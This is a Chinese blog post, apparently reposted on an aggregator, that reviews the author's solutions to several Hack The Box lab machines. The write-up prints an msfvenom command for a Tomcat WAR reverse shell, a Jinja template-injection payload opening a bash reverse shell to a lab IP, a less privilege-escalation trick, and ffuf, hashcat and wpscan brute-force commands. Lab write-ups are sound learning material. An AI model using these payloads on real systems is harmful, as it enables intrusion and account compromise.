HTB打靶復個小盤

文章目錄

  • jerry
  • Sau
  • GoodGames
  • devvotex
  • paper

最近打了不少靶場,雖然難度都不算高,但也學到不少東西,中間去打了一周的實網滲透,打完后聯系了一家企業準備面試,感覺面試準備的差不多了,回來繼續打靶,打之前復個小盤總結一下。

jerry

從jerry開始,學到tomcat類的服務器都自帶管理后臺,可以搜相關路徑爆破密碼,接下來學著部署war包實現上傳木馬的功能,

jar -cvf test.war "test.jsp"

并且如果連接不上,還可以用msf生成war包打反彈shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=43.155.67.230 LPORT=1234 -f war -o shell.war

接下來進去之后就拿到flag了,沒有后續操作

Sau

接下來是sau,入口點在request baskets,就是一個流量轉發工具,通過查找CVE達成了ssrf,獲取80端口的訪問權限。進來后同樣截圖丟給gpt,發現是maltrail,且存在未授權訪問漏洞,利用網上下的腳本拿到shell,接下來準備提權,提權的過程比較簡單,systemctl用于查看系統狀態,又是suid權限,關鍵人自帶的分頁程序就是less,從這里學到一個騷技巧,就是長文本用less打提權

!/bin/bash

GoodGames

這個靶場入口點是sql注入,說實話我覺得這個漏洞在當下有點多余了,一個參數化查詢就可以避免,但是不可否認的是它在當前的環境中確實還存在,所以有必要順手測一測(大廠的產品除外)

接下來拿到了一個密碼,md5解密,拿到管理員賬號登錄

沒想到管理員登錄后會有新的功能點(原來利用點在這啊

進去之后有一個修改資料頁面,在這樣的地方可以測一測ssti,通過ssti可以反彈shell

{{self.__init__.__globals__.__builtins__.__import__('os').popen("bash -c 'bash -i >& /dev/tcp/10.10.16.2/6666 0>&1'").read()}} 

反彈的shell不是真的終端,有一些功能限制,需要提升TTY

script -b /bin/bash -p /dev/null

進來之后發現root目錄是空的,找不到flag,這里出現了比較震撼的一點,這玩意竟然是在docker里

先用ifconfig看看接口,發現主機ip,接著看看/etc/passwd,發現沒有用戶augus,但是home里有,說明可能是直接從主機掛載過來的(類似共享文件夾),查看掛載

mount | grep augustus

隨后發現主機和掛載目錄的權限共享,竟然可以主機建文件然后docker給它授權

bash從4.2開始會默認丟棄特權,-p參數保留有效uid和gid

devvotex

從這里開始學到虛擬主機技術,從HOST中添加域名字段爆破子域名

ffuf -u FUZZ.devvortex.htb -w /home/gw/桌面/test/fuzzDicts-master/subdomainDicts/main.txt -fc 302

進dev子域名后發現Joomla cms的未授權訪問,拿到數據庫中用戶名和密碼

進去之后接著搜漏洞去打拿shell,反彈shell如果msf打不通可以直接用curl命令

拿到hash密碼后可以選擇使用hashcat爆破或者在線網站解

hashcat -m 3200 -a 0 pass.txt /usr/share/wordlists/rockyou.txt --show

https://hashes.com/zh/decrypt/hash

進去之后借助less提權

paper

見到檢測wordpress漏洞的工具wpscan,kali有自帶的

枚舉用戶名

wpscan --url http://derpnstink.local/weblog -e u

爆破密碼

wpscan --url http://office.paper -U prisonmike -P /home/gw/桌面/test/fuzzDicts-master/passwordDict/top500.txt

但這里思路歪了,對網站本身的信息收集不夠,應該往未授權查看草稿的方向去打

進來之后發現是一個聊天室rocket,這里版本比較高,直接用現成的是打不通了,但是這個bot有點問題,可以利用其訪問一些文件

拿到.env環境下的rocket配置,猜測跟ssh的密碼是一樣的,嘗試登錄

進去之后傳腳本打cve提權

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/pingmian/97801.shtml
繁體地址,請注明出處:http://hk.pswp.cn/pingmian/97801.shtml
英文地址,請注明出處:http://en.pswp.cn/pingmian/97801.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

云手機的技術架構可分為哪些

一、基礎設施層為其提供計算、存儲和網絡資源,高性能的服務器 CPU 是關鍵,它需具備多核多線程處理能力,以同時支持多個云手機實例的運行,比如英特爾至強系列處理器,能夠有效處理復雜的運算任務;通過虛擬化技…

[創業之路-585]:初創公司的保密安全與信息公開的效率提升

初創公司處于快速發展與資源有限的雙重約束下,平衡保密安全與信息公開效率是生存與發展的關鍵。保密安全可保護核心資產(如技術、客戶數據、商業計劃),避免被競爭對手模仿或惡意攻擊;而信息公開的效率則直接影響團隊協…

如何在Docker容器中為Stimulsoft BI Server配置HTTPS安全訪問

在 Stimulsoft BI Server 2025.3.1 版本中,新增了在 Docker 容器中運行 BI Server 的能力。本文將為大家介紹如何在容器環境中為 BI Server 配置 HTTPS 協議的數據傳輸,從而實現安全、加密的訪問。 為什么需要 HTTPS? **HTTPS(S…

PPT中將圖片裁剪為愛心等形狀

在WPS演示和PowerPoint中,使用裁剪功能,可以將插入的圖片裁剪為各種形狀,例如心形、五角形、云朵形等等。WPS演示還可以指定裁剪的位置,更加靈活。一、在PowerPoint中裁剪圖片為愛心等形狀將圖片插入到幻燈片后,選中圖…

深入理解Docker網絡:實現容器間的內部訪問

目錄一、利用宿主機 IP 外部端口實現容器互訪1.思路2.示例操作3.訪問測試4.工作原理5.總結二、Docker 容器之間的網絡通信(docker0 與自定義橋接網絡)1. docker0 簡介2. 通過容器 IP 訪問3. 自定義橋接網絡(推薦方式)創建自定義網…

ESD靜電保護二極管焊接時需要區分方向和極性嗎?-深圳阿賽姆

ESD靜電保護二極管焊接時需要區分方向和極性嗎?一、ESD二極管極性概述1.1 單向與雙向ESD二極管的基本區別ESD靜電保護二極管根據其內部結構和工作原理可分為兩種主要類型:單向ESD二極管(Unidirectional):具有明確的陽極…

Qt QML Switch和SwitchDelegate的區別?

在 Qt QML 中,Switch和 SwitchDelegate主要區別體現在定位、使用場景和功能特性上。以下是具體分析:?1. 核心定位??Switch?:是一個基礎的獨立交互控件?(繼承自 ToggleButton),用于直接提供“開/關”&a…

no module name ‘kaolin‘

如果報錯 no module named xxx 一般是沒安裝這個庫,但是各種邪修安裝了kaolin之后,還是報錯,這個報錯的核心信息是: ImportError: .../kaolin/_C.so: undefined symbol: _ZN3c104cuda20CUDACachingAllocator9allocatorE意思是 Ka…

OBS使用教程:OBS歌曲顯示插件如何下載?如何安裝使用?

OBS使用教程:OBS歌曲顯示插件如何下載?如何安裝使用? 第一步:下載OBS歌曲顯示插件,并完成安裝 OBS歌曲顯示插件下載地址①: https://d.obscj.com/obs-Setup_BGM.exe OBS歌曲顯示插件下載地址②&#xf…

基于 Java EE+MySQL+Dart 實現多平臺應用的音樂共享社區

基于多平臺應用的音樂共享社區 1 緒論 1.1 課題依據及意義 隨著互聯網娛樂項目的日益增多,內容也日漸豐富,加之網絡便利性的增強,越來越多的用戶喜歡在網上聽音樂。但是各平臺音樂資源殘次不齊,也包含了許多假無損音樂&#xf…

貪心算法在物聯網能耗優化中的應用

Java中的貪心算法在物聯網能耗優化中的應用 貪心算法是一種在每一步選擇中都采取當前狀態下最優決策的算法策略,它在物聯網(IoT)能耗優化問題中有著廣泛的應用。下面我將全面詳細地講解如何使用Java實現貪心算法來解決物聯網中的能耗優化問題。 一、物聯網能耗優化問…

59.【.NET8 實戰--孢子記賬--從單體到微服務--轉向微服務】--新增功能--MinIO對象存儲服務

在孢子記賬中我們需要存儲用戶的頭像、賬單的圖片等文件,這些文件的存儲我們可以使用MinIO對象存儲服務, MinIO提供了高性能、可擴展的對象存儲解決方案,能夠幫助我們輕松管理這些文件資源。通過MinIO,我們可以將用戶上傳的圖片文…

ESP32三種主流的開發環境

ESP32三種主流的開發環境 1. ESP-IDF (Espressif IoT Development Framework) 這是樂鑫官方提供的專業開發框架,基于FreeRTOS實時操作系統。 特點: 功能最全面,性能最優支持所有ESP32硬件特性使用C/C編程專業級調試工具完整的組件庫和API 適合…

HarmonyOS圖形處理:Canvas繪制與動畫開發實戰

本文將全面介紹HarmonyOS 5中Canvas組件的使用方法和動畫開發技巧,通過詳細的代碼示例和最佳實踐,幫助您掌握圖形繪制和動態效果實現的核心技能。 1. Canvas組件基礎與核心API Canvas是HarmonyOS中用于2D圖形繪制的重要組件,提供了豐富的繪圖…

CCAFusion:用于紅外與可見光圖像融合的跨模態坐標注意力網絡

CCAFusion:用于紅外與可見光圖像融合的跨模態坐標注意力網絡 CCAFusion: Cross-Modal Coordinate Attention Network for Infrared and Visible Image Fusion 摘要 紅外與可見光圖像融合旨在生成一幅包含全面信息的圖像,該圖像既能保留豐富的紋理特征&a…

ESP32-P4小智編譯歷險記:從“編譯失敗“到“成功燒錄“的奇幻之旅,xiaozhi智能聊天機器人編譯避坑心得

?? ESP32-P4:AI小智編譯歷險記:從"編譯失敗"到"成功燒錄"的奇幻之旅 要編譯其他芯片esp32s3-s2-c3,遇到問題也可以在這里交流 “每一個編譯錯誤都是成長的機會,每一次成功都是堅持的勝利!” —— 某位被編譯器折磨的程序員 源碼地址:https://githu…

DIFY 項目中通過 Makefile 調用 Dockerfile 并使用 sudo make build-web 命令構建 web 鏡像的方法和注意事項

DIFY 項目中通過 Makefile 調用 Dockerfile 并使用 sudo make build-web 命令構建 web 鏡像的場景,以下是具體方法和注意事項總結: 一、通過 sudo make build-web 構建 web 鏡像的核心方法 1. 理解 Makefile 與 Dockerfile 的關聯 Makefile 的作用:DIFY 的 Makefile 中定義…

重學前端015 --- 響應式網頁設計 CSS變換

文章目錄skew()transformcursortransition.arm .left {} 和 .arm.left {} 區別skew() skew 傾斜變換函數,該函數有兩個參數。第一個是剪切x軸的角度,第二個是剪切y軸的角度。 transform: skew(0deg, 44deg);transform .arm.left {top: 35%;left: 5%;t…

【GMX v1實戰】時序風險結算與資本成本:深度解析 GMX 永續合約的資金費率機制

在去中心化衍生品交易平臺GMX中,當你準備開立杠桿合約倉位(無論是做多還是做空某個資產)時,系統會默默執行一個關鍵前置動作——調用名為 ??updateCumulativeFundingRate?? 的函數。這個看似普通的“準備工作”,實…

中宇聯云計算SD-WAN的售后服務怎么樣

前言在數字化轉型浪潮中,企業選擇SD-WAN服務商不僅關注技術性能,更看重售后服務的質量與可靠性。中宇聯云計算作為行業領先者,其SD-WAN售后服務體系已成為行業標桿。隨著全球數字化進程加速,企業對廣域網(WAN&#xff…